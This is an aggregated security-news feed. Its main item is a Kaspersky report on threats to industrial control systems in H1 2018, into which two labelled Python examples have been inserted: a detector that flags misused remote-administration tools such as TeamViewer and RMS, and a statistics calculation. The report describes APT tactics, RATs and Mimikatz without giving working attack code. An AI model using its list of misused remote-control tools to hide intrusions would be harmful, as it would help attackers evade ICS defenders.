BitTorrent commonly refers to the infamous peer-to-peer (P2P) file-sharing protocol associated with piracy. Each year, BitTorrent’s desktop and mobile products are installed on hundreds of millions of new devices across 138 countries worldwide.


Despite the release of the web-based version, BitTorrent will continue to maintain the desktop version of uTorrent, now referred to as uTorrent Classic.

“As µTorrent Web now comes out of Beta and into full release, we know that millions of our users are familiar with and love the desktop version of µTorrent, also known as µTorrent Classic.

Our long-term plan is to continue development across both products and make them available on utorrent.com,” the company notes.

The product can be downloaded at utorrent.com and is currently available only for Windows. However, the company has plans to release a Mac version in the future.

The application is compatible with all major browsers such as Chrome, Firefox, Internet Explorer, Opera, and Microsoft Edge.

Check out the video below by µTorrent Web Product Designer Cory Keller, where he speaks about the new version of the torrenting tool.


The post BitTorrent launches uTorrent Web for simple torrenting experience appeared first on TechWorm.

Five-Eyes Intelligence Services Choose Surveillance Over Security

The Five Eyes -- the intelligence consortium of the rich English-speaking countries (the US, Canada, the UK, Australia, and New Zealand) -- have issued a "Statement of Principles on Access to Evidence and Encryption" where they claim their needs for surveillance outweigh everyone's needs for security and privacy.

...the increasing use and sophistication of certain encryption designs present challenges for nations in combatting serious crimes and threats to national and global security. Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution.

Privacy laws must prevent arbitrary or unlawful interference, but privacy is not absolute. It is an established principle that appropriate government authorities should be able to seek access to otherwise private information when a court or independent authority has authorized such access based on established legal standards. The same principles have long permitted government authorities to search homes, vehicles, and personal effects with valid legal authority.

The increasing gap between the ability of law enforcement to lawfully access data and their ability to acquire and use the content of that data is a pressing international concern that requires urgent, sustained attention and informed discussion on the complexity of the issues and interests at stake. Otherwise, court decisions about legitimate access to data are increasingly rendered meaningless, threatening to undermine the systems of justice established in our democratic nations.

To put it bluntly, this is reckless and shortsighted. I've repeatedly written about why this can't be done technically, and why trying results in insecurity. But there's a greater principle at first: we need to decide, as nations and as society, to put defense first. We need a "defense dominant" strategy for securing the Internet and everything attached to it.

This is important. Our national security depends on the security of our technologies. Demanding that technology companies add backdoors to computers and communications systems puts us all at risk. We need to understand that these systems are too critical to our society and -- now that they can affect the world in a direct physical manner -- affect our lives and property as well.

This is what I just wrote, in Click Here to Kill Everybody:

There is simply no way to secure US networks while at the same time leaving foreign networks open to eavesdropping and attack. There's no way to secure our phones and computers from criminals and terrorists without also securing the phones and computers of those criminals and terrorists. On the generalized worldwide network that is the Internet, anything we do to secure its hardware and software secures it everywhere in the world. And everything we do to keep it insecure similarly affects the entire world.

This leaves us with a choice: either we secure our stuff, and as a side effect also secure their stuff; or we keep their stuff vulnerable, and as a side effect keep our own stuff vulnerable. It's actually not a hard choice. An analogy might bring this point home. Imagine that every house could be opened with a master key, and this was known to the criminals. Fixing those locks would also mean that criminals' safe houses would be more secure, but it's pretty clear that this downside would be worth the trade-off of protecting everyone's house. With the Internet+ increasing the risks from insecurity dramatically, the choice is even more obvious. We must secure the information systems used by our elected officials, our critical infrastructure providers, and our businesses.

Yes, increasing our security will make it harder for us to eavesdrop, and attack, our enemies in cyberspace. (It won't make it impossible for law enforcement to solve crimes; I'll get to that later in this chapter.) Regardless, it's worth it. If we are ever going to secure the Internet+, we need to prioritize defense over offense in all of its aspects. We've got more to lose through our Internet+ vulnerabilities than our adversaries do, and more to gain through Internet+ security. We need to recognize that the security benefits of a secure Internet+ greatly outweigh the security benefits of a vulnerable one.

We need to have this debate at the level of national security. Putting spy agencies in charge of this trade-off is wrong, and will result in bad decisions.

Cory Doctorow has a good reaction.

Slashdot post.

Tripwire Patch Priority Index for August 2018

Tripwire’s August 2018 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Microsoft’s Internet Explorer, Edge, and Scripting Engine. These patches resolve 21 vulnerabilities, including fixes for Remote Code Execution, Elevation of Privilege, Information Disclosure, Memory Corruption, Security Feature Bypass, […]

The post Tripwire Patch Priority Index for August 2018 appeared first on The State of Security.

Use This NERC CIP v6 Standards Summary to Stay Compliant

Thanks to FERC’s Order 822, the North American Electric Reliability Corporation’s critical infrastructure protection standards, known as NERC CIP, are continually updated. Seven updated standards proposed by NERC for inclusion have now been accepted. April 1st, 2016, was the compliance deadline for the NERC CIP v5 requirements. Most of the newly-approved standards had a compliance […]

The post Use This NERC CIP v6 Standards Summary to Stay Compliant appeared first on The State of Security.

Threat Landscape for Industrial Automation Systems in H1 2018

For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems – those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the first half of 2018.

The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security.

Key events

Energetic Bear/Crouching Yeti: attacks on servers

In February, Kaspersky Lab ICS CERT published a report on an investigation into the initial infection tactics used by the notorious APT group Energetic Bear/Crouching Yeti, as well as the results of an analysis of several web servers compromised by the group in 2016 and early 2017, using information provided by the server owners.

Energetic Bear/Crouching Yeti has been active since at least 2010, attacking companies and individuals in various countries. The specialists at CrowdStrike initially noted a strong focus on the energy and industrial sectors, which may explain the name Energetic Bear. Later, when the diversity of the group’s attacks became clearer, the researchers at Kaspersky Lab named it Crouching Yeti. The targets of the attacks are mainly concentrated in Europe and the US. Recently, the number of attacks on companies in Turkey increased significantly. According to US-CERT and the UK National Cyber Security Centre, the Energetic Bear/Crouching Yeti APT group is linked to the Russian government.

The initial infection tactic used by the group is a multi-step process that begins with phishing emails carrying malicious documents being sent out, which leads to the infection of various servers. Some infected servers are used by the group as auxiliaries, used only for hosting various tools. Others are infected so they can be used in watering hole attacks, with some servers hosting an SMB link that leads to other servers that steal the authentication data of potential victims.

With some rare exceptions, the Energetic Bear/Crouching Yeti group uses publicly available tools to carry out their attacks. All the utilities discovered by the Kaspersky Lab ICS CERT experts have open source code that is freely available on GitHub. This makes the task of attack attribution very difficult without additional group “markers”.

In most cases observed by Kaspersky Lab ICS CERT, the attackers performed tasks to identify vulnerabilities, gain persistence on different nodes and steal authentication data in order to develop the attack further.

An analysis of the compromised servers and the attacks on them showed that for Energetic Bear/Crouching Yeti, almost any vulnerable server on the internet is seen as a potential foothold from which to develop targeted attacks.

The investigation into the initial, intermediate and subsequent targets of these attacks also revealed a diverse geography. The largest number of victims and targets was in Russia, followed by Turkey and Ukraine. Under half of the systems attacked were related to industry, agricultural services and utilities.

Attacks on industrial enterprises using RATs

Kaspersky Lab ICS CERT reported on yet another wave of phishing emails containing malicious attachments aimed primarily at industrial enterprises in Russia. The malicious program used in the attacks installs legitimate software for remote administration – TeamViewer or Remote Manipulator System/Remote Utilities (RMS) – that allows attackers to gain remote control over the targeted systems. Various techniques are used to mask the presence and activity of the unauthorized software.

When they need to move further within a compromised network, the attackers can download an additional set of malicious programs, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools, software to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.
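A defender-side detection for the pattern just described (legitimate remote administration software appearing on industrial hosts, delivered through a phishing attachment), as an added example that is not part of the Kaspersky Lab report: it scans constructed process-creation log lines and flags remote-admin launches that break the expectations an ICS operator can state in advance. The log format, host and user names and the maintenance allowlist are constructed; the executable names for TeamViewer and RMS are assumptions taken from the products' public installers, not from the report.

```python
"""Added example (not from the Kaspersky report): flag launches of legitimate
remote-administration software on ICS hosts from process-creation log lines.
The log format, host names, user names and the maintenance allowlist are
constructed; the executable names are assumptions drawn from the public
installers of TeamViewer and Remote Manipulator System (RMS)."""
import csv
import io
import ntpath
from typing import Dict, List

# Executable name -> product (assumed names, lower-cased for matching).
REMOTE_ADMIN_TOOLS: Dict[str, str] = {
    "teamviewer.exe": "TeamViewer",
    "tv_w32.exe": "TeamViewer",
    "rutserv.exe": "RMS",
    "rfusclient.exe": "RMS",
}

# Hosts where remote administration is sanctioned, e.g. during maintenance (assumption).
AUTHORIZED_HOSTS = {"eng-ws-02"}

# A remote-admin tool whose parent is a document handler was most likely dropped
# by a malicious attachment rather than installed by an administrator.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed process-creation events (Sysmon-like fields flattened to CSV).
SAMPLE_LOG = """timestamp,host,image,parent_image,user
2018-05-02T10:15:00Z,eng-ws-02,C:\\Program Files\\TeamViewer\\TeamViewer.exe,C:\\Windows\\explorer.exe,eng\\maint
2018-05-04T03:12:44Z,hmi-line3,C:\\Users\\op\\AppData\\Local\\Temp\\rutserv.exe,C:\\Program Files\\Microsoft Office\\WINWORD.EXE,op
2018-05-04T03:13:01Z,hmi-line3,C:\\Windows\\System32\\notepad.exe,C:\\Windows\\explorer.exe,op
2018-05-05T22:40:00Z,scada-srv-1,C:\\ProgramData\\tv_w32.exe,C:\\Windows\\System32\\cmd.exe,SYSTEM
"""


def detect_remote_admin(log_text: str) -> List[dict]:
    """Return one finding per remote-admin launch that breaks at least one expectation."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        image = ntpath.basename(row["image"]).lower()
        tool = REMOTE_ADMIN_TOOLS.get(image)
        if tool is None:
            continue  # not a remote-administration binary
        reasons = []
        if row["host"] not in AUTHORIZED_HOSTS:
            reasons.append("unauthorized host")
        if ntpath.basename(row["parent_image"]).lower() in DOCUMENT_PARENTS:
            reasons.append("spawned by document handler")
        if not row["image"].lower().startswith("c:\\program files"):
            reasons.append("unusual install path")   # Temp, ProgramData, user profile ...
        if reasons:
            findings.append({"timestamp": row["timestamp"], "host": row["host"],
                             "tool": tool, "user": row["user"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in detect_remote_admin(SAMPLE_LOG):
        print(finding)
```

The sanctioned TeamViewer launch on the maintenance workstation produces no finding; the RMS service started from WINWORD.EXE out of a Temp directory on an HMI trips all three checks, which is the signature of the phishing-delivered installs the report describes.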

Also, Kaspersky Lab products blocked multiple attacks on the industrial network of an automobile manufacturer and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Over a period of several months, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched, this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Trojan-Downloader.Nymaim malware family was also blocked. Representatives of this family are often used to download modifications of the Necurs family botnet agent, which in turn is used to infect computers with ransomware from the Locky family.

Statistics

All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.

Methodology

The data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

The statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.

For the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of unique computers attacked to all computers in our sample from which we received anonymized information during the reporting period.

ICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.

Workstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.

As a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 42% of all machines had regular or full-time internet connections in H1 2018. The remaining machines connected to the Internet no more than once a month, many much less frequently than that.

Main figures

The percentage of ICS computers attacked in H1 2018 increased by 3.5 p.p. compared with H2 2017 and reached 41.2%. The year-over-year increase was 4.6 p.p.

Percentage of ICS computers attacked, H1 2017 – H1 2018

A comparison between different regions of the world shows that:

  • countries in Africa, Asia and Latin America are significantly worse off in terms of the percentage of ICS computers attacked than countries in Europe, North America and Australia;
  • the figures for Eastern Europe are considerably greater than those for Western Europe;
  • the percentage of ICS computers attacked in Southern Europe is higher than that in Northern and Western Europe.

Presumably, this situation could be due to the amounts of funds invested by organizations in infrastructure protection solutions.

Percentage of ICS systems attacked in regions of the world, H1 2018 vs H2 2017

The main sources of infection for computers in organizations’ industrial network infrastructure are the internet, removable media and email. Contrary to the conventional wisdom about control networks being isolated, in recent years the internet has become the main source of infection for computers on organizations’ industrial networks.

Main sources of threats blocked on ICS computers (percentage of computers attacked during half-year periods), H1 2017 – H1 2018

While a year ago, in H1 2017, the internet was the source of threats blocked on 20.6% of ICS computers, in H1 2018 the figure was as high as 27.3%.
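The counting rule from the Methodology section (a computer is "attacked" if a security solution was triggered on it at least once; the percentage is unique attacked computers over all computers in the sample) applied to a constructed sample, as an added example that is not part of the report. It shows why per-source figures like the 27.3% above do not add up to the overall percentage: a machine hit from two sources counts once overall but once in each source's figure. Machines, regions and detection events are all constructed.

```python
"""Added example (not from the report): the counting rule from the Methodology
section applied to a constructed sample. A machine is "attacked" if any
detection fired on it during the period; repeated detections on one machine
count once; a machine hit from two sources counts once overall but once in
each source's figure. All machines and events below are constructed."""
from typing import Callable, Dict, List, Tuple

# machine id -> (role from the Methodology list, region); constructed sample.
MACHINES: Dict[str, Tuple[str, str]] = {
    "m01": ("SCADA server", "Europe"),
    "m02": ("Historian", "Europe"),
    "m03": ("OPC gateway", "Europe"),
    "m04": ("engineer workstation", "Europe"),
    "m05": ("HMI", "Europe"),
    "m06": ("SCADA server", "Asia"),
    "m07": ("engineer workstation", "Asia"),
    "m08": ("HMI", "Asia"),
    "m09": ("Historian", "Asia"),
    "m10": ("OPC gateway", "Asia"),
}

# (machine id, blocked threat source); constructed detections over one half-year.
EVENTS: List[Tuple[str, str]] = [
    ("m01", "internet"), ("m01", "internet"),          # same machine twice: counts once
    ("m04", "internet"), ("m04", "removable media"),   # one machine, two sources
    ("m06", "removable media"),
    ("m07", "email"),
    ("m08", "internet"), ("m08", "internet"),
]


def attacked_share(events: List[Tuple[str, str]], machines: Dict[str, Tuple[str, str]],
                   keep: Callable[[str], bool] = lambda m: True) -> float:
    """Percentage of machines (optionally restricted by `keep`) with at least one detection."""
    population = [m for m in machines if keep(m)]
    attacked = {m for m, _ in events if m in machines and keep(m)}   # set: unique machines
    if not population:
        return 0.0
    return round(100.0 * len(attacked) / len(population), 1)


def share_by_source(events, machines) -> Dict[str, float]:
    """Per-source figure: share of all machines on which that source was blocked."""
    sources = sorted({src for _, src in events})
    return {src: attacked_share([e for e in events if e[1] == src], machines) for src in sources}


def share_by_region(events, machines) -> Dict[str, float]:
    """Regional figure: each region's attacked machines over that region's population."""
    regions = sorted({region for _, region in machines.values()})
    return {r: attacked_share(events, machines, keep=lambda m, r=r: machines[m][1] == r)
            for r in regions}


def percentage_point_change(previous: float, current: float) -> float:
    """Report changes in percentage points (p.p.), as the report does, not relative percent."""
    return round(current - previous, 1)


if __name__ == "__main__":
    print("overall:", attacked_share(EVENTS, MACHINES))
    print("by source:", share_by_source(EVENTS, MACHINES))
    print("by region:", share_by_region(EVENTS, MACHINES))
```

In the sample, the per-source shares (30%, 20% and 10%) sum to 60% while the overall share is 50%, because one workstation was reached both from the internet and from removable media.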

Main sources of threats blocked on ICS computers by region, H1 2018

More information about events during H1 2018, detailed statistics and our recommendations can be found in the full version of the report (PDF).

Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is a global project launched by Kaspersky Lab in 2016 to coordinate the efforts of automation system vendors, industrial facility owners and operators, and IT security researchers to protect industrial enterprises from cyberattacks. Kaspersky Lab ICS CERT devotes its efforts primarily to identifying potential and existing threats that target industrial automation systems and the Industrial Internet of Things.

Throwback Thursday: Well, trial and error IS a mechanism

New regulations go into effect requiring more physical and electronic security at this health insurance company, so the company hires a chief security officer to oversee the efforts, says a pilot fish there.

"I was involved in the original security implementation on most of the systems and offered to help, but the new CSO refused our input," fish says. "He put keycard access on the computer room and UPS room and confiscated any physical keys he could find.

"When asked what would happen if the keycard system went down, he responded that 'mechanisms are in place,'" fish recalls.

Soon, only three people have physical keys: the CSO, chief financial officer and facilities manager.
